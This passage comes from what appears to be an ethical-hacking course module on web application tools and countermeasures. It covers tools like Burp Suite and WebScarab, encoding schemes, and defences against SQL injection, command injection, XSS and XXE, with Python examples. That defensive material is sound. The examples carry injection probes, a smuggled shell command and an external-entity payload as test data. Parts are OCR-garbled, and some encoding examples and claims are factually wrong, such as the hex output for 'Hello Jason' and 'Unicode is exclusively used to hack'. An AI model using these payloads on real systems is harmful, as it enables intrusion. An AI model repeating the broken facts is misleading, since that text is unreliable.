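Recent libexpat versions also cap entity amplification on their own, but the depth and size ceilings are still the application's job, and rejecting the DOCTYPE outright is simpler to reason about than relying on the library's default ratio.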



Web Service Attack Tool: soapUI


Source: http://www.soapui.org

soapUI is an open source functional testing tool, mainly used for web service testing. It supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. It enables you to create advanced performance tests very quickly and run automated functional tests. With the help of this tool, attackers can easily perform web services probing, SOAP injection, XML injection, and web services parsing attacks.


FIGURE 13.56: soapUI Tool Screenshot (the soapUI workspace with a sample service project open: the navigator shows the WSDL's bindings and messages such as searchRequest/searchResponse, buyRequest/buyResponse and the login and logout faults, with a request editor and its property panel alongside)



Web Service Attack Tool: XMLSpy


Source: http://www.altova.com

Altova XMLSpy is an XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies. It offers a graphical schema designer, SmartFix validation, a code generator, file converters, debuggers, profilers, full database integration, support for WSDL, SOAP, XSLT, XPath, XQuery, XBRL, and Open XML documents, plus Visual Studio and Eclipse plug-ins, and more.


FIGURE 13.57: XMLSpy Tool Screenshot (Altova XMLSpy debugging the stylesheet TheAgencyR3.xslt against a personnel document that references the schema TheAgency.xsd, with the call stack, variables, XPath watch and result-document panes visible)


^M odule Flow
So fa r, w e h a v e discu s sed w e b a p p li c a t i o n c o n c e p ts , t h r e a t s a s s o c ia te d w i t h w e b a p p li c a t i o n , a n d t h e h a c k in g m e t h o d o l o g y . N o w w e w i ll discuss h a c k in g to o ls . T h e se t o o l s h e lp a t ta c k e r s in r e t r i e v i n g s e n s itiv e i n f o r m a t i o n a n d also t o c r a f t a n d se nd m a lic io u s p a c k e ts o r r e q u e s ts t o t h e v i c t i m . W e b a p p li c a t i o n h a c k in g t o o l s a re e s p e c ia lly d e s ig n e d f o r i d e n t i f y i n g t h e v u l n e r a b i l it ie s in t h e w e b a p p li c a t i o n . W i t h t h e h e lp o f th e s e to o ls , t h e a t t a c k e r can e a sily e x p l o i t t h e i d e n t if ie d v u l n e r a b i l it ie s a n d c a r r y o u t w e b a p p l i c a t i o n a tta c k s .

[Module flow diagram: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing]


This section lists and describes various web application hacking tools such as Burp Suite Professional, CookieDigger, WebScarab, and so on.


Web Application Hacking Tool: Burp Suite Professional

Source: http://www.portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. Burp Suite contains key components such as an intercepting proxy, an application-aware spider, an advanced web application scanner, an intruder tool, a repeater tool, a sequencer tool, etc.


[Screenshot residue: Burp Suite Free Edition v1.4.01, Intruder "attack 1" window with the target, positions and payloads tabs, the results table (status, error, length columns) and the raw request/response panes]

FIGURE 13.58: Burp Suite Professional Tool Screenshot


Web Application Hacking Tool: CookieDigger

CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications.

It works by collecting and analyzing cookies issued by a web application for multiple users.

The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, is included in the cookie values.


Web Application Hacking Tool: CookieDigger

Source: http://www.mcafee.com

CookieDigger is a tool that detects vulnerable cookie generation and insecure implementation of session management by web applications. This tool is based on the collection and evaluation of the cookies issued by a web application to many users. Predictability and entropy of the cookie are the factors on which the tool relies. The tool also checks whether the cookie values contain valuable information such as the login details of the user (user name and password).
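The checks described above (entropy, predictability, and credentials embedded in the cookie value) can be reproduced in a few lines. The following is an added example written for this section; it is not CookieDigger's code and not from the original text. The cookie values in it are constructed samples, not captured from any application.

```python
import base64
import math
import re
from collections import Counter

# Constructed sample cookie values (not captured from any real application).
# WEAK_COOKIES: a static prefix followed by an incrementing counter.
WEAK_COOKIES = ["SESS1001", "SESS1002", "SESS1003", "SESS1004", "SESS1005"]
# STRONG_COOKIES: 64-bit values rendered as hex, the shape a CSPRNG would produce.
STRONG_COOKIES = [
    "3f9a7c21e8b04d5a", "a81e5f3c09d7b642", "c2d4e6f8a0b1c3d5",
    "7b0e9d1a4f6c8e2b", "e5c3a1f7d9b2c4a6",
]
# LEAKY_COOKIE: credentials merely Base64-encoded (not encrypted) into the cookie.
LEAKY_COOKIE = base64.b64encode(b"user=alice;pwd=secret").decode()


def per_position_entropy(cookies):
    """Shannon entropy in bits of the symbol at each position across the sample set."""
    n = len(cookies)
    width = min(len(c) for c in cookies)
    result = []
    for i in range(width):
        counts = Counter(c[i] for c in cookies)
        result.append(-sum((k / n) * math.log2(k / n) for k in counts.values()))
    return result


def static_prefix_len(cookies):
    """Number of leading positions with zero entropy: a constant prefix carries no secret."""
    count = 0
    for h in per_position_entropy(cookies):
        if h > 0:
            break
        count += 1
    return count


def looks_sequential(cookies):
    """True when every cookie ends in a number and consecutive samples differ by one."""
    tails = [re.search(r"(\d+)$", c) for c in cookies]
    if len(tails) < 2 or any(m is None for m in tails):
        return False
    values = [int(m.group(1)) for m in tails]
    return all(b - a == 1 for a, b in zip(values, values[1:]))


def credential_exposed(cookie, username, password):
    """Look for the credentials in the raw value and in its Base64 decoding."""
    candidates = [cookie]
    try:
        candidates.append(base64.b64decode(cookie, validate=True).decode("utf-8", "replace"))
    except (ValueError, UnicodeDecodeError):
        pass
    return any(username in c and password in c for c in candidates)


def analyze(cookies, username=None, password=None):
    """Summarize the predictability indicators for a set of cookies from one application."""
    entropies = per_position_entropy(cookies)
    exposed = False
    if username is not None and password is not None:
        exposed = any(credential_exposed(c, username, password) for c in cookies)
    return {
        "static_prefix_len": static_prefix_len(cookies),
        "sequential": looks_sequential(cookies),
        "mean_position_entropy_bits": sum(entropies) / len(entropies),
        "credential_exposed": exposed,
    }


if __name__ == "__main__":
    for label, sample in (("weak", WEAK_COOKIES), ("strong", STRONG_COOKIES)):
        print(label, analyze(sample))
    print("leaky", analyze([LEAKY_COOKIE], "alice", "secret"))
```

Per-position entropy is the useful measure here: a long cookie whose first seven characters never change contributes nothing to guessing resistance, and a trailing counter makes neighbouring users' sessions trivially related. Five samples is the minimum to show the idea; a real assessment collects many more, because entropy estimated from a handful of values is only a lower bound.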


[Screenshot residue: Foundstone CookieDigger wizard listing visited URLs and captured POST data, with User ID and Password fields and Back/Next buttons]

FIGURE 13.59: CookieDigger Tool Screenshot


Web Application Hacking Tool: WebScarab

WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols. It allows the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser.

[Screenshot residue: WebScarab Summary tab showing the conversation list for http://www.owasp.org:80/ with Method, Status, Origin and Set-Cookie columns]

http://www.owasp.org

Web Application Hacking Tool: WebScarab

Source: http://www.owasp.org

WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. It operates as an intercepting proxy, allowing the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. It is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.


[Screenshot residue: WebScarab main window with the Proxy, Manual Request, WebServices, Spider, Extensions, SessionID Analysis, Scripted, Fragments and Fuzzer tabs, and the Summary conversation list for http://www.owasp.org:80/]

FIGURE 13.60: WebScarab Tool Screenshot



Web Application Hacking Tools

A few more tools that can be used for hacking web applications are listed as follows:

- Instant Source, available at http://www.blazingtools.com
- HttpBee, available at http://www.o0o.nu
- w3af, available at http://w3af.sourceforge.net
- Teleport Pro, available at http://www.tenmax.com
- GNU Wget, available at http://gnuwin32.sourceforge.net
- WebCopier, available at http://www.maximumsoft.com
- BlackWidow, available at http://softbytelabs.com
- HTTrack, available at http://www.httrack.com
- cURL, available at http://curl.haxx.se
- MileSCAN ParosPro, available at http://www.milescan.com



Module Flow

So far, we have discussed various concepts such as the threats associated with web applications, the hacking methodology, and hacking tools. All these topics talk about how the attacker breaks into a web application or a website. Now we will discuss web application countermeasures. Countermeasures are the practice of using multiple security systems or technologies to prevent intrusions. These are the key components for protecting and safeguarding the web application against web application attacks.

[Module flow diagram: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing]


This section highlights various ways in which you can defend against web application attacks such as SQL injection attacks, command injection attacks, XSS attacks, etc.


Encoding Schemes

Web applications employ different encoding schemes for their data to safely handle unusual characters and binary data in the way you intend.

URL encoding is the process of converting a URL into valid ASCII format so that data can be safely transported over HTTP. URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as %3d (=), %0a (new line), and %20 (space).

An HTML encoding scheme is used to represent unusual characters so that they can be safely combined within an HTML document. It defines several HTML entities to represent particular characters such as &amp; (&), &lt; (<), and &gt; (>).

Encoding Schemes

The HTTP protocol and the HTML language are the two major components of web applications. Both of these components are text based. Web applications employ encoding schemes to ensure that both components handle unusual characters and binary data safely. The encoding schemes include:

URL Encoding: URLs are permitted to contain only the printable characters of the ASCII code within the range 0x20-0x7e inclusive. Several characters within this range have special meaning when they appear in the URL scheme or the HTTP protocol. Hence, such characters are restricted. URL encoding is the process of converting URLs into valid ASCII format so that data can be safely transported over HTTP. URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in hexadecimal, such as:

%3d  =
%0a  new line
%20  space


HTML Encoding: The HTML encoding scheme is used to represent unusual characters so that they can be safely entered within an HTML document as part of its content. The structure of the document is defined by various characters. If you want to use the same characters as part of the document's content, you may face a problem. This problem can be overcome by using HTML encoding. It defines several HTML entities to represent particular characters such as:

&amp;  &
&lt;   <
&gt;   >


Encoding Schemes (Cont'd)

Base64 Encoding: The Base64 encoding scheme represents any binary data using only printable ASCII characters.

Hex Encoding: The hex encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data. Example: Hello Jason -> A125C458D8 123B684AD9

Encoding Schemes (Cont'd)

Base64 Encoding: Base64 encoding schemes are used to encode binary data. A Base64 encoding scheme represents any binary data using only printable ASCII characters. Usually it is used for the safe transmission of binary data over email, for encoding email attachments for SMTP, and also for encoding user credentials. Example:

cake
01100011 01100001 01101011 01100101
Base64 Encoding: 011000 110110 000101 101011 011001 010000 000000 000000

Hex Encoding: The hex encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data. Example:

Hello Jason
A125C458D8 123B684AD9

Unicode Encoding: Unicode is a character encoding standard that is designed to support all of the writing systems used in the world. Unicode is exclusively used to hack web applications; Unicode encoding helps attackers to bypass the filters.

16-bit Unicode encoding: It replaces unusual characters with "%u" followed by the character's Unicode code point expressed in hexadecimal:
%u2215 %u00e9

UTF-8: It is a variable-length encoding standard that uses each byte expressed in hexadecimal and preceded by the % prefix:
%c2%a9 %e2%89%a0

TABLE 13.2: Encoding Schemes Table
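The schemes in Table 13.2 are easy to confuse, and a filter that inspects input before decoding it is checking the wrong representation. The block below is an added example for this section, not code from the original text: it produces each encoding from the table for the table's own sample values (the URL and %u encoders are written out rather than taken from a library so the output uses the same lowercase hex as the table), and canonicalize() shows the defensive counterpart, decoding to a stable form before any validation runs.

```python
import base64
import binascii
import html
import string
import urllib.parse

# Characters left untouched by URL encoding (the RFC 3986 "unreserved" set).
URL_SAFE = set(string.ascii_letters + string.digits + "-._~")


def url_encode(text):
    """Percent-encode every byte of the UTF-8 form of any character outside URL_SAFE.
    For ASCII this is one %xx per character; for non-ASCII, one %xx per UTF-8 byte."""
    out = []
    for ch in text:
        if ch in URL_SAFE:
            out.append(ch)
        else:
            out.extend(f"%{b:02x}" for b in ch.encode("utf-8"))
    return "".join(out)


def url_decode(text):
    return urllib.parse.unquote(text)


def html_encode(text):
    """Replace the characters that shape an HTML document with entities."""
    return html.escape(text, quote=True)


def base64_encode(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


def hex_encode(data: bytes) -> str:
    return binascii.hexlify(data).decode("ascii")


def unicode16_encode(text):
    """Legacy %uXXXX form: one unit per code point, not per byte."""
    return "".join(ch if ch in URL_SAFE else f"%u{ord(ch):04x}" for ch in text)


def canonicalize(value, max_rounds=3):
    """Undo URL encoding until the value stops changing, then undo HTML entities.
    A check applied before this step sees '%253c' rather than '<' and is easily bypassed."""
    current = value
    for _ in range(max_rounds):
        decoded = url_decode(current)
        if decoded == current:
            break
        current = decoded
    return html.unescape(current)


if __name__ == "__main__":
    print(url_encode("a=b c\n"), url_encode("\u00a9"))
    print(html_encode("<a href='x'>&</a>"))
    print(base64_encode(b"cake"), hex_encode(b"Hello Jason"), unicode16_encode("\u00e9\u2215"))
    print(canonicalize("%253Cscript%253E"))
```

Note the asymmetry the table hints at: %u00e9 and %c3%a9 both denote the letter é, but a filter that understands only one of them will miss the other, which is why canonicalize() is applied once, to a single agreed representation, before any allow-list is consulted.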


How to Defend Against SQL Injection Attacks

- Limit the length of user input
- Use custom error messages
- Monitor DB traffic using an IDS, WAF
- Disable commands like xp_cmdshell (Microsoft SQL Server)
- Isolate database server and web server
- Always use method attribute set to POST
- Run database service account with minimal rights
- Move extended stored procedures to an isolated server
- Use typesafe variables or functions such as IsNumeric() to ensure type safety
- Validate and sanitize user inputs passed to the database
- Use low privileged account for DB connection

How to Defend Against SQL Injection Attacks

To defend against SQL injection attacks, various things have to be taken care of: unchecked user input to database queries should not be allowed to pass. Every user variable passed to the database should be validated and sanitized. The given input should be checked for the expected data type. User input which is passed to the database should be quoted.

- Limit the length of user input
- Use custom error messages
- Monitor DB traffic using an IDS, WAF
- Disable commands like xp_cmdshell
- Isolate database server and web server
- Always use method attribute set to POST
- Run database service account with minimal rights
- Move extended stored procedures to an isolated server
- Use typesafe variables or functions such as IsNumeric() to ensure type safety
- Validate and sanitize user inputs passed to the database


- Use low privileged account for DB connection
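Several of the items above (validation, type safety, length limits, custom error messages, and passing user input to the database as a bound value) come together in the following added example, which is not from the original text. It uses Python's built-in sqlite3 module against a constructed in-memory table, and keeps the concatenated query only as the "before" case so the difference is visible on the same input.

```python
import re
import sqlite3

# Allow-list for a user name; it also enforces the length limit from the list above.
NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def make_db():
    """In-memory table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    return conn


def lookup_vulnerable(conn, name):
    """Concatenation: the user's text becomes part of the SQL grammar (the 'before' case)."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """Bound parameter: the driver sends the value separately, so it can never alter the query."""
    return conn.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


def is_valid_name(name):
    return bool(NAME_RE.match(name))


def parse_user_id(raw):
    """Type-safety check in the spirit of IsNumeric(): accept decimal digits only, else None."""
    return int(raw) if raw.isdigit() else None


def lookup_hardened(conn, name):
    """Validate against the allow-list, bind the parameter, and never echo driver errors."""
    if not is_valid_name(name):
        return []
    try:
        return lookup_parameterized(conn, name)
    except sqlite3.Error:
        # The detailed error belongs in the server log; the client sees a generic message.
        raise LookupError("Request could not be processed") from None


def lookup_by_id(conn, raw_id):
    """Numeric parameters are converted first, so '1 OR 1=1' never reaches the query."""
    uid = parse_user_id(raw_id)
    if uid is None:
        return None
    return conn.execute("SELECT name, email FROM users WHERE id = ?", (uid,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"
    print("concatenated:", lookup_vulnerable(db, probe))
    print("parameterized:", lookup_parameterized(db, probe))
    print("hardened:", lookup_hardened(db, probe), lookup_by_id(db, "1 OR 1=1"))
```

The parameterized query alone already stops the probe from returning every row; the allow-list and the numeric check are defence in depth that also cover the cases where a value has to go somewhere a driver cannot bind it, such as a table name or an ORDER BY column. The low-privilege connection account from the list is configured on the database side and is not shown here.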


How to Defend Against Command Injection Flaws


The simplest way to protect against command injection flaws is to avoid them wherever possible. Some language-specific libraries perform identical functions for many shell commands and some system calls. These libraries do not invoke the operating system shell interpreter, and so avoid most shell command problems. For those calls that must still be used, such as calls to backend databases, one must carefully validate the data to ensure that it does not contain malicious content. One can also arrange the various requests in a pattern which ensures that all given parameters are treated as data instead of potentially executable content. Most system calls, and the use of stored procedures with parameters that accept valid input strings to access a database, or prepared statements, provide significant protection by ensuring that the supplied input is treated as data. This reduces, but does not completely eliminate, the risk involved in these external calls. One can always authorize the input to ensure the protection of the application in question. Least privileged accounts must be used to access a database so that there is the smallest possible loophole. The other strong protection against command injection is to run web applications with only the privileges required to carry out their functions.

Therefore, one should avoid running the web server as root, or accessing a database as DBADMIN, or else an attacker may be able to misuse administrative rights. The use of the Java sandbox in the J2EE environment stops the execution of system commands.


The use of an external command requires thoroughly checking the user information that is inserted into the command. Create a mechanism for handling all possible errors, timeouts, or blockages during the calls. To ensure the expected work is actually performed, check all the output, return, and error codes from the call. At least this allows the user to determine if something has gone wrong. Otherwise, an attack may occur and never be detected.

- Perform input validation
- Use language-specific libraries that avoid problems due to shell commands
- Use a safe API that avoids the use of the interpreter entirely
- Use parameterized SQL queries
- Escape dangerous characters
- Perform input and output encoding
- Structure requests so that all supplied parameters are treated as data, rather than potentially executable content
- Use modular shell disassociation from kernel
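The three steps just listed for an external call (validate the input, pass it as data rather than through the interpreter, and check the timeout and exit status) are shown together in this added example, which is not from the original text. It stands in for a tool such as a hostname lookup by running a one-line Python program that prints its first argument, so the effect of the shell can be observed without depending on any particular utility being installed.

```python
import re
import subprocess
import sys

# Hostname allow-list (RFC 1123 labels); anything else is refused before any call is made.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

# Stand-in for an external command: a Python one-liner that prints its first argument.
ECHO_SNIPPET = "import sys; print(sys.argv[1])"


def is_valid_hostname(value):
    return bool(HOSTNAME_RE.match(value))


def resolve_vulnerable(host):
    """The 'before' case: a command line is built and handed to the shell, so shell
    metacharacters in host (';', '|', '`', '$(') are interpreted as further commands."""
    cmd = f'{sys.executable} -c "{ECHO_SNIPPET}" {host}'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def resolve_no_shell(host):
    """Argument vector, no shell: the value arrives as a single argv entry, i.e. as data."""
    proc = subprocess.run([sys.executable, "-c", ECHO_SNIPPET, host],
                          capture_output=True, text=True)
    return proc.stdout.strip()


def resolve_hardened(host, timeout=5.0):
    """Allow-list the input, avoid the shell, bound the run time, and check the outcome."""
    if not is_valid_hostname(host):
        return {"ok": False, "error": "rejected by hostname allow-list", "output": ""}
    try:
        proc = subprocess.run(
            [sys.executable, "-c", ECHO_SNIPPET, host],
            capture_output=True, text=True, timeout=timeout, check=False,
        )
    except subprocess.TimeoutExpired:
        return {"ok": False, "error": "timeout", "output": ""}
    if proc.returncode != 0:
        return {"ok": False, "error": f"exit {proc.returncode}: {proc.stderr.strip()}", "output": ""}
    return {"ok": True, "error": None, "output": proc.stdout.strip()}


if __name__ == "__main__":
    tainted = "example.com; echo INJECTED"
    print(repr(resolve_vulnerable(tainted)))
    print(repr(resolve_no_shell(tainted)))
    print(resolve_hardened(tainted))
    print(resolve_hardened("example.com"))
```

resolve_no_shell() already neutralises the metacharacters because there is no interpreter between the program and the child process; resolve_hardened() adds what the text asks for on top of that: the request is refused before the call when it fails the allow-list, a hung call is reported as a timeout rather than left blocking, and a non-zero exit is surfaced instead of silently returning empty output.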


How to Defend Against XSS Attacks

- Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification
- Encode input and output and filter metacharacters in the input
- Use testing tools extensively during the design phase to eliminate such XSS holes in the application before it goes into use
- Do not always trust websites that use HTTPS when it comes to XSS
- Develop some standard or signing scripts with private and public keys that actually check to ascertain that the script introduced is really authenticated
- Convert all non-alphanumeric characters to HTML character entities before displaying the user input in search engines and forums
- Use a web application firewall to block the execution of malicious script
- Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users

How to Defend Against XSS Attacks

The following are the defensive techniques to prevent XSS attacks: Check and validate all the form fields, hidden fields, headers, cookies, query strings, and all the parameters against a rigorous specification. Implement a stringent security policy. Web servers, application servers, and web application environments are vulnerable to cross-site scripting. It is hard to identify and remove XSS flaws from web applications. The best way to find flaws is to perform a security review of the code, and search in all the places where input from an HTTP request comes out as output through HTML. A variety of different HTML tags can be used to transmit malicious JavaScript. Nessus, Nikto, and other tools can help to some extent in scanning websites for these flaws. If a vulnerability is discovered in one website, there is a high chance of it being vulnerable to other attacks. Filter the script output to defeat XSS vulnerabilities, which can prevent them from being transmitted to users. The entire code of the website has to be reviewed if it is to be protected against XSS attacks. The sanity of the code should be checked by reviewing and comparing it against exact specifications. The areas to be checked are as follows: the headers, as well as


c o o k ie s , q u e r y s tr in g f o r m fie ld s , a n d h id d e n fie ld s . D u r in g t h e v a li d a t i o n p ro ce ss, t h e r e m u s t be n o a t t e m p t t o re c o g n iz e t h e a c tiv e c o n t e n t , n e i t h e r t o r e m o v e t h e f i l t e r n o r s a n itiz e it. T h e r e a re m a n y w a y s t o e n c o d e t h e k n o w n f i l t e r s f o r a c tiv e c o n t e n t . A " p o s i t i v e s e c u r i t y p o l i c y " is h ig h ly r e c o m m e n d e d , w h i c h s p e c ifie s w h a t has t o be a ll o w e d a nd w h a t has t o be r e m o v e d . N e g a t iv e o r a t t a c k s ig n a t u r e - b a s e d p o lic ie s a re h a r d t o

m a i n t a i n , as t h e y a re i n c o m p l e t e . 0 I n p u t fie ld s s h o u ld be l i m i t e d t o a m a x i m u m since m o s t s c r ip t a tta c k s n e e d s e v e ra l c h a r a c te r s t o g e t s t a r t e d .
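As an added example (not part of the module), the positive security policy and output filtering described above in Python: every input source is validated against an allow-list specification, unknown parameters are refused rather than cleaned, and anything echoed back is entity-encoded. The parameter names, the specification table and the sample requests are constructed for illustration.

```python
"""Positive-policy input validation and HTML output encoding.

Added example, not the CEH module's code. Parameter names, the
specification table and the sample requests are constructed.
"""
import html
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class FieldSpec:
    """What one request parameter is allowed to look like."""
    pattern: str            # full-match regular expression (the allow-list)
    max_len: int            # hard length cap; script payloads need several chars
    required: bool = True


# Rigorous specification for every input source: form fields, hidden
# fields, query string, cookies and headers are all covered. Anything not
# listed is refused outright (positive policy), never "cleaned up".
SPEC: Dict[str, Dict[str, FieldSpec]] = {
    "form": {
        "username": FieldSpec(r"[A-Za-z0-9_.-]{3,32}", 32),
        "comment": FieldSpec(r"[\w .,!?'\"()-]{0,500}", 500, required=False),
    },
    "hidden": {"csrf_token": FieldSpec(r"[A-Fa-f0-9]{32}", 32)},
    "query": {"page": FieldSpec(r"[0-9]{1,4}", 4, required=False)},
    "cookie": {"session": FieldSpec(r"[A-Za-z0-9]{16,64}", 64)},
    "header": {"x-requested-with": FieldSpec(r"XMLHttpRequest", 14, required=False)},
}


def validate_request(request: Dict[str, Dict[str, str]]) -> List[str]:
    """Check every parameter of every input source against SPEC.

    Returns the list of violations; an empty list means the request is
    clean. No attempt is made to recognize or strip script content: a value
    either matches its specification exactly or the request is refused.
    """
    violations: List[str] = []
    for source, fields in SPEC.items():
        supplied = request.get(source, {})
        for name in supplied:                      # unknown parameters are refused
            if name not in fields:
                violations.append(f"{source}.{name}: unexpected parameter")
        for name, spec in fields.items():
            value = supplied.get(name)
            if value is None:
                if spec.required:
                    violations.append(f"{source}.{name}: missing")
                continue
            if len(value) > spec.max_len:
                violations.append(f"{source}.{name}: exceeds {spec.max_len} chars")
                continue
            if re.fullmatch(spec.pattern, value) is None:
                violations.append(f"{source}.{name}: does not match specification")
    return violations


def render_comment(username: str, comment: str) -> str:
    """Build the HTML fragment in which request input is echoed back.

    Output filtering: each value that came from an HTTP request is
    entity-encoded at the point it is written into HTML, so even a value
    that passed validation cannot be interpreted as markup or script.
    """
    safe_user = html.escape(username, quote=True)
    safe_comment = html.escape(comment, quote=True)
    return f'<p class="comment"><b>{safe_user}</b>: {safe_comment}</p>'


# Constructed sample requests (not captured traffic).
CLEAN_REQUEST = {
    "form": {"username": "alice_01", "comment": "Nice article, thanks!"},
    "hidden": {"csrf_token": "0123456789abcdef0123456789abcdef"},
    "query": {"page": "2"},
    "cookie": {"session": "k3jH8sD9fG2hJ4kL6mN8pQ1rS3tU5vW7"},
    "header": {},
}
BAD_REQUEST = {
    "form": {"username": "alice_01", "comment": "<script>alert(1)</script>"},
    "hidden": {"csrf_token": "0123456789abcdef0123456789abcdef"},
    "query": {"page": "2", "debug": "1"},
    "cookie": {"session": "k3jH8sD9fG2hJ4kL6mN8pQ1rS3tU5vW7"},
    "header": {},
}

if __name__ == "__main__":
    print(validate_request(CLEAN_REQUEST))     # []
    print(validate_request(BAD_REQUEST))       # two violations
    print(render_comment("alice_01", 'Say "hi" <b>loudly</b>'))
```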



How to Defend Against DoS Attacks


The following are the various measures that can be adopted to defend against DoS attacks:

- Configure the firewall to deny external Internet Control Message Protocol (ICMP) traffic access.
- Secure the remote administration and connectivity testing.
- Prevent the use of unnecessary functions such as gets and strcpy, and prevent return addresses from being overwritten.
- Prevent sensitive information from being overwritten.
- Perform thorough input validation.
- Data processed by the attacker should be stopped from being executed.



How to Defend Against Web Services Attacks


To defend against web services attacks, there should be a provision for multiple layers of protection that dynamically enforces legitimate application usage and blocks all known attack paths with or without relying on signature databases. This combination has proven effective in blocking even unknown attacks. Standard HTTP authentication techniques such as digest and SSL client-side certificates can be used for web services as well. Since most models incorporate business-to-business applications, it becomes easier to restrict access to only valid users.

- Configure firewalls/IDSs for web services anomaly and signature detection.
- Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages.
- Configure firewalls/IDS systems to filter improper SOAP and XML syntax.
- Use document-centric authentication credentials that use SAML.
- Implement centralized in-line requests and responses schema validation.
- Use multiple security credentials such as X.509 certificates, SAML assertions, and WS-Security.
- Block external references and use pre-fetched content when de-referencing URLs.
- Deploy web-services-capable firewalls capable of SOAP- and ISAPI-level filtering.


- Maintain and update a secure repository of XML schemas.
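An added Python example (not the module's code) of two of the measures listed above: centralized in-line schema validation of SOAP requests, and refusing any message that could make the parser de-reference external content. The service namespace, the GetOrder schema and the sample envelopes are constructed for illustration.

```python
"""Centralized SOAP request validation with external references blocked.

Added example, not the module's code. Service namespace, schema and
sample envelopes are constructed.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SERVICE_NS = "urn:example:orders"            # constructed service namespace

# In-line schema for the single operation this endpoint accepts:
# element name -> (required, full-match pattern for its text content)
GET_ORDER_SCHEMA: Dict[str, Tuple[bool, str]] = {
    "orderId": (True, r"[0-9]{1,12}"),
    "format": (False, r"json|xml"),
}


def reject_external_references(raw: bytes) -> List[str]:
    """Refuse any document that could make the parser fetch remote content.

    External entities and external DTDs can only be declared in a DOCTYPE,
    so the whole message is refused when one is present instead of letting
    the parser de-reference anything.
    """
    lowered = raw.lower()
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        return ["DOCTYPE/ENTITY declarations are not accepted"]
    return []


def validate_soap_request(raw: bytes) -> List[str]:
    """Parse a SOAP 1.1 envelope and check its Body against GET_ORDER_SCHEMA.

    Returns the list of problems; an empty list means the request is accepted.
    """
    problems = reject_external_references(raw)
    if problems:
        return problems
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    if root.tag != f"{{{SOAP_NS}}}Envelope":
        return ["root element is not a SOAP Envelope"]
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None or len(body) != 1:
        return ["Body must contain exactly one operation element"]
    operation = body[0]
    if operation.tag != f"{{{SERVICE_NS}}}GetOrder":
        return ["unknown operation"]
    prefix = f"{{{SERVICE_NS}}}"
    seen = set()
    for child in operation:
        if not child.tag.startswith(prefix):
            problems.append("element outside the service namespace")
            continue
        name = child.tag[len(prefix):]
        if name not in GET_ORDER_SCHEMA or name in seen:
            problems.append(f"unexpected or duplicate element {name}")
            continue
        seen.add(name)
        _, pattern = GET_ORDER_SCHEMA[name]
        # Every field is plain text: nested markup is a violation as well.
        if len(child) or re.fullmatch(pattern, child.text or "") is None:
            problems.append(f"element {name} violates schema")
    for name, (required, _) in GET_ORDER_SCHEMA.items():
        if required and name not in seen:
            problems.append(f"missing required element {name}")
    return problems


# Constructed sample envelopes (not captured traffic).
GOOD_REQUEST = b"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <o:GetOrder xmlns:o="urn:example:orders">
      <o:orderId>1000234</o:orderId>
      <o:format>json</o:format>
    </o:GetOrder>
  </soap:Body>
</soap:Envelope>"""

XXE_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE order [<!ENTITY ext SYSTEM "http://example.invalid/placeholder.dtd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><o:GetOrder xmlns:o="urn:example:orders"><o:orderId>&ext;</o:orderId></o:GetOrder></soap:Body>
</soap:Envelope>"""

BAD_SCHEMA_REQUEST = b"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <o:GetOrder xmlns:o="urn:example:orders">
      <o:orderId>12ab</o:orderId>
      <o:debug>1</o:debug>
    </o:GetOrder>
  </soap:Body>
</soap:Envelope>"""

if __name__ == "__main__":
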